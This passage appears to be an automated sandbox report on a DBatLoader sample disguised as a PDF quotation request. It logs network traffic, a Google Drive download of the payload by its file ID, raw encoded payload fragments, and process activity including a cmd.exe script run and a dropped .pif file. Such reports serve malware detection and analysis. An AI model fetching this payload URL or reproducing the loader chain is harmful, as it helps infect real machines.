                                                                Dec 24, 2024 11:28:50.202888012 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.216276884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.216620922 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.216691017 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.216691971 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.216706991 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.216747999 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.217636108 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.218286991 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.218339920 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.218348026 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.231343985 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.231411934 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.231466055 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.231482029 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.231524944 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.232042074 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.232880116 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.232944012 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.232950926 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.245125055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.245210886 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.245295048 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.245306015 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.245356083 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.245995998 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.258902073 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.258966923 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.258975983 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.259305954 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.259349108 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.259356022 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.260261059 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.260318995 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.260327101 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.260361910 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.260668993 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.260791063 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.260802984 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:50.260828018 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:50.260833979 CET44349707142.250.181.1192.168.2.11

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 24, 2024 11:28:40.641876936 CET5681153192.168.2.111.1.1.1
                                                                Dec 24, 2024 11:28:40.780070066 CET53568111.1.1.1192.168.2.11
                                                                Dec 24, 2024 11:28:43.447410107 CET5341653192.168.2.111.1.1.1
                                                                Dec 24, 2024 11:28:43.585596085 CET53534161.1.1.1192.168.2.11

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 24, 2024 11:28:40.641876936 CET192.168.2.111.1.1.10x18d2Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Dec 24, 2024 11:28:43.447410107 CET192.168.2.111.1.1.10xa10eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 24, 2024 11:28:40.780070066 CET1.1.1.1192.168.2.110x18d2No error (0)drive.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                Dec 24, 2024 11:28:43.585596085 CET1.1.1.1192.168.2.110xa10eNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • drive.google.com
                                                                • drive.usercontent.google.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1149705172.217.19.2384437920C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-24 10:28:42 UTC205OUTGET /uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6 HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: drive.google.com
                                                                2024-12-24 10:28:43 UTC1319INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Tue, 24 Dec 2024 10:28:43 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NB5iI7J2SX1bTCau5-U0rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1149707142.250.181.14437920C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-24 10:28:45 UTC223OUTGET /download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: drive.usercontent.google.com
                                                                2024-12-24 10:28:48 UTC4932INHTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AFiumC7_S1-CAlj44UIjzvkPYNPvV3Ql7zo9-mvwqjdVAODW7NN6g4hk0907wTQ_hx6IMN08
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="233_Csswqtmksmz"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 820608
                                                                Last-Modified: Mon, 23 Dec 2024 10:57:05 GMT
                                                                Date: Tue, 24 Dec 2024 10:28:48 GMT
                                                                Expires: Tue, 24 Dec 2024 10:28:48 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=I/VCqQ==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-12-24 10:28:48 UTC4932INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 67 48 69 51 6d 46 42 6b 66 4a 42 73 55 45 78 63 58 49 41 34 66 46 78 41 64 49 42 38 61 4a 79 4d 57 46 69 49 61 4a 78 6b 68 45 78 6f 50 48 68 38 66 45 79 59 6a 48 42 4d 57 46 78 59 64 4a 52 34 51 49 53 51 54 48 68 6b 5a 47 53 45 63 45 67 38 67 4a 79 55 68 4a 42 38 6d 4a 42 38 67 47 79 4d 65 47 42 6b 56 47 69 4d 6d 49 42 63 69 45 78 34 56 47 68 6b 61 4a 78 30 53 48 69 49 52 4a 78 45 51 45 52 47 6d 72 71 56 5a 49 36 65 78 53 30 34 67 49 43 51 65 49 52 6f 59 49 42 6f 6e 70 71 36 6c 57 53 4f 6e 73 55 75 6f 71 71 53 69 74 4b 2b 70 70 4b 32 30 74 62 47 78 71 4c 71 70 73 62 69 72 71 4b 6d 75 6f 61 57 79 73 71 61 75 6f 61 2b 6e 74 61 36 35 71 71 6d 70 74 61 4b 6c 72 4c 57 79 73 62 4b 72 6f 36 71 34 70 36 53 31 71 71 2b 76 72 36 65
                                                                Data Ascii: pq6lWSOnsUsgHiQmFBkfJBsUExcXIA4fFxAdIB8aJyMWFiIaJxkhExoPHh8fEyYjHBMWFxYdJR4QISQTHhkZGSEcEg8gJyUhJB8mJB8gGyMeGBkVGiMmIBciEx4VGhkaJx0SHiIRJxEQERGmrqVZI6exS04gICQeIRoYIBonpq6lWSOnsUuoqqSitK+ppK20tbGxqLqpsbirqKmuoaWysqauoa+nta65qqmptaKlrLWysbKro6q4p6S1qq+vr6e
                                                                2024-12-24 10:28:48 UTC4833INData Raw: 45 35 57 54 7a 79 39 39 78 6b 62 38 5a 71 41 46 68 48 30 36 6c 45 62 71 57 49 46 47 69 32 50 6f 51 63 33 6c 58 4a 49 41 7a 39 44 69 70 6a 31 59 32 6c 43 38 69 45 6e 55 56 4e 78 5a 59 72 34 35 45 75 47 67 34 52 4b 65 47 78 73 2b 75 4c 58 79 57 6a 6e 30 42 77 58 53 6f 6b 34 44 30 39 45 53 6a 4b 68 6a 41 42 44 4d 41 49 42 62 44 4e 63 6a 2b 6d 4e 4b 45 46 47 44 50 38 62 4a 67 6b 64 64 50 32 48 37 78 56 4f 45 37 6b 73 76 35 7a 49 53 75 42 50 34 5a 6d 57 55 52 31 2f 47 72 78 72 46 42 67 6f 75 43 7a 58 69 38 2f 6f 76 4e 2f 4e 42 71 46 73 35 55 45 4c 30 48 35 54 36 78 75 45 34 67 2b 6a 79 39 33 73 68 32 42 30 4f 52 6a 79 49 4d 52 30 69 4b 4b 4e 6a 2f 31 6c 4f 32 57 4b 67 63 62 2f 6c 66 32 63 30 77 58 6c 69 4e 70 79 7a 4b 48 2b 51 51 73 57 55 64 5a 4f 55 67 2b 76
                                                                Data Ascii: E5WTzy99xkb8ZqAFhH06lEbqWIFGi2PoQc3lXJIAz9Dipj1Y2lC8iEnUVNxZYr45EuGg4RKeGxs+uLXyWjn0BwXSok4D09ESjKhjABDMAIBbDNcj+mNKEFGDP8bJgkddP2H7xVOE7ksv5zISuBP4ZmWUR1/GrxrFBgouCzXi8/ovN/NBqFs5UEL0H5T6xuE4g+jy93sh2B0ORjyIMR0iKKNj/1lO2WKgcb/lf2c0wXliNpyzKH+QQsWUdZOUg+v
                                                                2024-12-24 10:28:48 UTC1323INData Raw: 56 36 61 72 62 6f 4a 77 67 36 41 74 73 52 4b 73 52 67 71 55 73 76 69 63 33 6f 36 37 59 6c 53 73 32 49 2b 68 7a 6c 4d 45 68 44 5a 31 68 49 47 43 65 2b 6f 6b 32 31 4c 64 46 6e 4e 43 41 53 6e 58 30 59 34 56 41 54 33 55 56 56 52 55 43 4e 76 76 72 70 49 4c 46 36 44 64 36 4a 4b 68 49 59 6f 35 4c 41 70 30 74 69 53 72 46 4a 36 54 45 4e 72 52 79 33 36 41 61 66 68 33 55 67 57 4f 32 62 48 4a 50 4a 57 6a 52 51 59 62 7a 78 58 62 54 31 43 36 51 37 61 46 43 33 6f 39 45 36 66 74 67 78 55 62 4e 65 53 48 74 73 31 54 64 48 67 32 2b 69 2f 39 37 71 4d 49 61 6a 77 77 76 57 39 58 44 52 2b 71 41 2f 69 6e 6b 4b 32 2b 71 67 71 74 62 4d 56 70 67 6f 33 4a 5a 6c 6b 2f 79 4c 4c 53 43 53 41 30 6a 6f 2b 44 47 72 31 4d 50 71 6d 69 46 33 66 65 77 6a 72 4c 79 62 6b 4b 73 6c 71 55 6f 7a 7a
                                                                Data Ascii: V6arboJwg6AtsRKsRgqUsvic3o67YlSs2I+hzlMEhDZ1hIGCe+ok21LdFnNCASnX0Y4VAT3UVVRUCNvvrpILF6Dd6JKhIYo5LAp0tiSrFJ6TENrRy36Aafh3UgWO2bHJPJWjRQYbzxXbT1C6Q7aFC3o9E6ftgxUbNeSHts1TdHg2+i/97qMIajwwvW9XDR+qA/inkK2+qgqtbMVpgo3JZlk/yLLSCSA0jo+DGr1MPqmiF3fewjrLybkKslqUozz
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 7a 38 4a 4d 4b 2f 71 77 67 4b 39 6d 63 47 61 46 50 2b 38 38 6a 33 59 31 77 2f 78 55 68 50 52 56 34 59 48 70 50 62 55 71 62 65 31 43 64 69 4f 62 33 34 39 57 48 4d 59 59 5a 2f 2b 70 34 63 47 39 6c 31 66 53 77 37 43 62 4f 66 76 2f 6f 78 75 62 55 4b 59 49 76 35 70 52 30 55 69 65 55 30 77 6f 2b 6a 2b 4e 75 63 4d 45 5a 74 41 39 43 62 72 47 6b 4d 53 50 43 52 72 77 74 30 4e 4c 53 4c 6d 53 56 4f 54 63 62 71 4b 61 75 65 69 49 44 76 48 79 43 76 6b 66 33 61 4e 30 54 2b 68 43 6f 55 75 44 45 36 48 53 31 59 5a 67 6f 78 4f 50 44 70 6c 51 6e 41 37 6c 6c 44 31 45 4d 44 61 2b 69 39 32 6b 50 66 48 66 67 54 66 4c 63 6e 68 71 62 39 57 37 49 66 71 35 38 59 30 5a 2f 50 66 4d 4c 49 4a 45 64 78 6e 68 31 77 54 44 72 46 47 4c 59 71 4d 59 4e 5a 61 76 38 35 77 4c 48 6e 76 73 6b 79 6a
                                                                Data Ascii: z8JMK/qwgK9mcGaFP+88j3Y1w/xUhPRV4YHpPbUqbe1CdiOb349WHMYYZ/+p4cG9l1fSw7CbOfv/oxubUKYIv5pR0UieU0wo+j+NucMEZtA9CbrGkMSPCRrwt0NLSLmSVOTcbqKaueiIDvHyCvkf3aN0T+hCoUuDE6HS1YZgoxOPDplQnA7llD1EMDa+i92kPfHfgTfLcnhqb9W7Ifq58Y0Z/PfMLIJEdxnh1wTDrFGLYqMYNZav85wLHnvskyj
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 76 6b 61 79 65 61 58 38 52 61 43 68 47 69 7a 55 39 66 38 4a 50 35 4a 68 5a 6a 74 6b 59 44 50 7a 49 45 62 67 6f 4a 76 35 78 5a 33 6a 48 61 51 4b 32 5a 62 76 35 57 2b 75 57 53 39 70 6a 63 54 4a 49 54 38 63 39 55 53 67 35 6c 68 51 42 74 34 30 41 45 39 46 37 56 68 79 71 7a 73 38 78 66 59 34 45 5a 6a 72 7a 76 44 57 6b 33 59 6e 72 54 63 75 39 50 70 49 66 2f 69 79 6d 53 57 37 42 7a 47 70 2b 38 30 4d 55 6a 59 50 73 6b 38 74 4e 77 79 65 4e 72 4a 76 6b 35 67 6b 4b 79 39 46 39 35 59 64 31 4c 4f 7a 4b 47 63 30 2f 31 53 48 71 4e 30 56 67 73 6d 62 66 33 58 49 42 63 42 57 35 38 35 39 55 57 2b 68 50 38 32 4c 32 32 6d 71 31 52 65 45 71 36 54 70 6c 41 78 4a 30 4b 38 71 6d 35 33 67 71 59 71 34 45 68 67 44 70 67 70 76 66 56 53 32 6d 65 65 46 4f 32 37 34 6f 35 47 35 4c 70 32
                                                                Data Ascii: vkayeaX8RaChGizU9f8JP5JhZjtkYDPzIEbgoJv5xZ3jHaQK2Zbv5W+uWS9pjcTJIT8c9USg5lhQBt40AE9F7Vhyqzs8xfY4EZjrzvDWk3YnrTcu9PpIf/iymSW7BzGp+80MUjYPsk8tNwyeNrJvk5gkKy9F95Yd1LOzKGc0/1SHqN0Vgsmbf3XIBcBW5859UW+hP82L22mq1ReEq6TplAxJ0K8qm53gqYq4EhgDpgpvfVS2meeFO274o5G5Lp2
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 74 41 79 37 56 47 6d 59 7a 2f 6e 50 65 65 44 4f 71 57 5a 33 79 42 48 36 79 77 56 4f 49 7a 7a 45 6c 6f 42 76 63 30 73 74 4d 4e 38 6e 4d 32 42 38 70 33 69 62 47 4e 77 62 74 71 31 48 47 6b 42 37 4c 4a 63 71 79 36 4e 66 4b 61 65 42 47 69 47 61 74 6b 6e 63 71 2b 69 52 61 63 66 37 64 76 54 53 46 45 61 32 4c 2b 4f 6a 67 4f 70 67 52 78 46 6c 56 6b 32 31 56 36 41 30 30 78 48 2f 58 6f 2b 58 62 74 32 75 50 73 62 77 72 65 62 77 39 43 77 4c 52 73 4d 74 35 76 57 72 33 41 45 48 37 6f 47 49 54 35 48 71 47 34 71 38 55 62 66 65 6c 4d 63 58 47 36 4b 58 2b 34 4f 37 35 35 32 55 2b 65 6f 33 6c 54 52 67 4e 68 4a 63 33 42 46 77 7a 67 34 36 59 39 2b 42 73 78 4d 78 7a 75 69 61 46 37 37 70 66 43 63 74 6d 4b 69 68 6e 48 65 52 4f 55 4e 32 46 70 39 42 47 2f 75 63 30 4b 52 6f 73 56 65
                                                                Data Ascii: tAy7VGmYz/nPeeDOqWZ3yBH6ywVOIzzEloBvc0stMN8nM2B8p3ibGNwbtq1HGkB7LJcqy6NfKaeBGiGatkncq+iRacf7dvTSFEa2L+OjgOpgRxFlVk21V6A00xH/Xo+Xbt2uPsbwrebw9CwLRsMt5vWr3AEH7oGIT5HqG4q8UbfelMcXG6KX+4O7552U+eo3lTRgNhJc3BFwzg46Y9+BsxMxzuiaF77pfCctmKihnHeROUN2Fp9BG/uc0KRosVe
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 2f 49 31 58 6f 74 59 33 33 6c 4a 35 63 71 57 49 67 57 48 6b 69 53 54 49 54 58 67 47 70 62 67 6c 7a 50 76 6d 35 78 6f 6c 49 6b 6e 79 52 4c 55 31 45 79 30 6d 34 48 66 69 44 62 37 76 6a 50 48 30 34 37 34 6d 57 61 6f 45 53 77 76 66 66 53 69 6a 54 47 36 31 62 38 65 56 33 2f 42 63 37 56 63 4f 4b 4c 62 71 54 78 79 55 4d 6a 49 64 39 51 4c 38 58 58 34 58 74 7a 68 56 53 6b 33 47 70 36 50 31 55 56 74 49 71 30 56 32 48 74 51 6c 6d 38 54 66 32 39 68 72 31 77 38 42 52 4c 67 7a 55 44 70 65 4f 66 64 75 79 39 55 78 46 4a 6b 31 57 51 49 62 4c 4c 34 65 44 69 37 74 4c 50 7a 59 47 4b 4a 4c 39 62 4c 70 31 59 38 48 66 6d 67 43 70 33 53 73 6f 45 38 64 6c 6a 67 66 64 50 52 75 6a 35 49 53 46 4c 68 6d 74 59 61 75 6d 46 66 77 62 78 41 39 68 55 73 4f 4b 56 78 57 36 6a 30 61 30 53 4c
                                                                Data Ascii: /I1XotY33lJ5cqWIgWHkiSTITXgGpbglzPvm5xolIknyRLU1Ey0m4HfiDb7vjPH0474mWaoESwvffSijTG61b8eV3/Bc7VcOKLbqTxyUMjId9QL8XX4XtzhVSk3Gp6P1UVtIq0V2HtQlm8Tf29hr1w8BRLgzUDpeOfduy9UxFJk1WQIbLL4eDi7tLPzYGKJL9bLp1Y8HfmgCp3SsoE8dljgfdPRuj5ISFLhmtYaumFfwbxA9hUsOKVxW6j0a0SL
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 6d 54 52 5a 2f 34 64 6d 4b 32 4e 31 2b 5a 79 74 56 65 30 4b 67 42 4e 35 30 33 36 4b 4e 51 67 74 43 32 52 33 63 4d 41 4e 44 66 79 66 2f 6c 63 6a 61 72 6f 65 49 37 4f 4e 66 4a 55 78 33 36 43 52 66 46 4d 69 66 4e 4a 48 72 62 4d 45 6b 4e 51 35 7a 62 2b 58 6c 6f 4d 45 6f 57 73 48 62 50 50 53 58 5a 65 66 53 7a 68 62 38 7a 71 67 7a 43 2b 30 52 37 74 48 4e 54 71 7a 43 79 33 39 6a 73 4e 33 4f 69 61 61 53 6f 6c 53 65 73 2b 75 51 38 46 42 31 43 63 74 48 5a 41 31 6c 7a 33 63 37 37 31 30 4e 36 68 68 55 58 42 69 6e 54 66 2b 65 69 41 50 64 67 43 4f 4f 37 76 74 6e 6d 56 2f 52 62 36 36 6c 6f 56 61 6f 4d 42 71 73 42 74 38 4a 45 50 44 4c 66 4e 54 4a 34 4e 63 57 62 62 62 56 54 65 56 70 74 6c 61 5a 51 51 31 4b 61 36 76 68 43 75 51 42 47 68 35 76 2f 4f 58 62 30 70 4d 46 6a 6c
                                                                Data Ascii: mTRZ/4dmK2N1+ZytVe0KgBN5036KNQgtC2R3cMANDfyf/lcjaroeI7ONfJUx36CRfFMifNJHrbMEkNQ5zb+XloMEoWsHbPPSXZefSzhb8zqgzC+0R7tHNTqzCy39jsN3OiaaSolSes+uQ8FB1CctHZA1lz3c7710N6hhUXBinTf+eiAPdgCOO7vtnmV/Rb66loVaoMBqsBt8JEPDLfNTJ4NcWbbbVTeVptlaZQQ1Ka6vhCuQBGh5v/OXb0pMFjl
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 38 6e 62 37 55 66 53 65 33 4d 54 4d 64 4e 4a 77 75 51 4d 7a 51 42 65 78 6f 79 36 30 62 69 75 77 73 65 4e 5a 6a 74 59 73 4e 51 70 66 6b 6d 52 78 51 78 65 47 7a 79 61 57 4f 79 36 31 52 71 4e 46 33 79 65 58 54 37 33 75 59 4c 69 54 6b 6f 56 66 48 56 45 46 2b 64 49 4c 62 49 54 69 4f 68 69 38 75 4f 4e 6a 4d 47 72 65 4a 37 6e 48 57 4d 66 6a 2f 49 78 67 4e 34 6d 6e 65 47 56 6e 32 5a 6c 49 41 63 2f 6d 4f 76 5a 74 75 2b 53 42 35 39 59 49 2b 4d 72 55 6a 4d 49 73 64 51 4a 66 4f 62 44 49 38 57 30 34 6f 48 6f 32 41 57 37 70 56 69 58 34 77 6a 4e 56 41 68 47 62 4f 46 48 5a 77 35 61 77 74 38 62 46 41 4e 65 69 30 38 32 4e 37 38 32 5a 63 4d 4f 36 34 30 58 63 74 41 59 6b 36 69 78 77 42 4a 71 68 46 52 4e 52 4c 34 67 42 48 53 72 6c 39 56 76 75 73 6a 2b 44 53 49 48 56 64 61 6b
                                                                Data Ascii: 8nb7UfSe3MTMdNJwuQMzQBexoy60biuwseNZjtYsNQpfkmRxQxeGzyaWOy61RqNF3yeXT73uYLiTkoVfHVEF+dILbITiOhi8uONjMGreJ7nHWMfj/IxgN4mneGVn2ZlIAc/mOvZtu+SB59YI+MrUjMIsdQJfObDI8W04oHo2AW7pViX4wjNVAhGbOFHZw5awt8bFANei082N782ZcMO640XctAYk6ixwBJqhFRNRL4gBHSrl9Vvusj+DSIHVdak
                                                                2024-12-24 10:28:48 UTC1390INData Raw: 33 57 65 58 51 53 39 65 54 51 38 65 51 58 50 54 64 6b 62 57 38 6a 53 6b 36 41 64 6c 51 32 79 39 69 41 41 42 64 69 68 78 4a 5a 66 33 55 6d 31 55 41 69 7a 69 6a 41 54 59 76 38 7a 32 68 6c 6b 49 5a 48 36 48 2f 44 65 51 44 4f 4f 50 59 69 55 4a 32 43 49 79 46 6b 70 63 6a 30 38 63 62 43 2f 48 71 34 79 33 42 41 7a 63 56 46 47 38 52 49 52 36 35 36 75 2f 33 47 53 64 63 78 72 54 71 44 55 4a 67 69 62 6e 39 69 4a 4f 47 52 79 6b 77 66 5a 33 59 50 37 77 64 7a 76 59 6a 4d 4f 39 67 75 42 64 66 5a 74 7a 79 76 6e 6f 59 70 41 59 41 34 6d 44 72 53 6d 7a 77 74 72 66 33 47 53 4d 6d 76 47 62 49 41 37 59 39 6a 70 78 4a 39 71 2f 69 76 4e 77 71 75 6f 68 52 6f 32 7a 55 79 78 71 69 48 34 68 64 6b 57 48 42 6e 65 43 4a 43 64 41 59 64 63 4d 74 6c 67 70 72 44 79 69 52 59 52 61 63 72 35
                                                                Data Ascii: 3WeXQS9eTQ8eQXPTdkbW8jSk6AdlQ2y9iAABdihxJZf3Um1UAizijATYv8z2hlkIZH6H/DeQDOOPYiUJ2CIyFkpcj08cbC/Hq4y3BAzcVFG8RIR656u/3GSdcxrTqDUJgibn9iJOGRykwfZ3YP7wdzvYjMO9guBdfZtzyvnoYpAYA4mDrSmzwtrf3GSMmvGbIA7Y9jpxJ9q/ivNwquohRo2zUyxqiH4hdkWHBneCJCdAYdcMtlgprDyiRYRacr5


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:1
                                                                Start time:05:28:38
                                                                Start date:24/12/2024
                                                                Path:C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe"
                                                                Imagebase:0x400000
                                                                File size:1'525'248 bytes
                                                                MD5 hash:AACA1B72E0AC5DC118B0F981667E8179
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.1454887836.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.1415147873.0000000002466000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:05:28:49
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:05:28:49
                                                                Start date:24/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:05:28:50
                                                                Start date:24/12/2024
                                                                Path:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\kmtqwssC.pif
                                                                Imagebase:0x400000
